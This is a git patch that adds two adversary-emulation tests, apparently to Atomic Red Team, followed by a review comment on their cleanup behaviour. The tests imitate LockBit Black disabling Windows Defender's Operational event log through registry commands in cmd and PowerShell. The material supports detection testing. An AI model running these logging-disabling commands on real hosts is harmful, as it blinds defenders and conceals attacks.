From b31a0b6484bd363d1a0ca2ef0e473834ad021a6e Mon Sep 17 00:00:00 2001
From: arames13 <91679765+arames13@users.noreply.github.com>
Date: Wed, 3 Aug 2022 10:06:14 -0500
Subject: [PATCH] T1562.006-update (#2066)

Co-authored-by: anupama ramesh
Co-authored-by: Carrie Roberts
---
 atomics/T1562.006/T1562.006.yaml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)

diff --git a/atomics/T1562.006/T1562.006.yaml b/atomics/T1562.006/T1562.006.yaml
index 37d92628..23263616 100644
--- a/atomics/T1562.006/T1562.006.yaml
+++ b/atomics/T1562.006/T1562.006.yaml
@@ -129,3 +129,29 @@ atomic_tests:
     cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
     name: powershell
   elevation_required: true
+- name: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
+  description: |
+    An adversary can disable the ETW Provider of Windows Defender,
+    so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" /v Operational /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" /v Operational /f >nul 2>&1
+    name: command_prompt
+  elevation_required: true
+- name: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
+  description: |
+    An adversary can disable the ETW Provider of Windows Defender,
+    so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" -Name Operational -PropertyType DWord -Value 0 -Force
+    cleanup_command: |
+      Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" -Name Operational -Force -ErrorAction Ignore
+    name: powershell
+  elevation_required: true
\ No newline at end of file
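Review bot: Both new tests' cleanup commands delete the `Operational` value outright (`reg delete ... /v Operational /f` and `Remove-ItemProperty ... -Name Operational -Force`) instead of restoring whatever was there before, and the setup commands (`reg add ... /f`, `New-ItemProperty ... -Force`) silently overwrite any pre-existing data, so on a host where that value already exists the "cleanup" leaves the channel configuration changed; the description should say so, e.g. `Cleanup removes the value rather than restoring its prior data; snapshot the key before running.` The description names the channel `Microsoft-Windows-Windows-Defender/Operational` (hyphenated) while the registry path writes under `Microsoft-Windows-Windows Defender` (with a space); the two spellings should agree so a reader correlating this with event-log channel names is not misled. The file is also left without a trailing newline (`\ No newline at end of file`), which yamllint flags; add one. The enclosing `atomic_tests:` sequence begins outside the hunk.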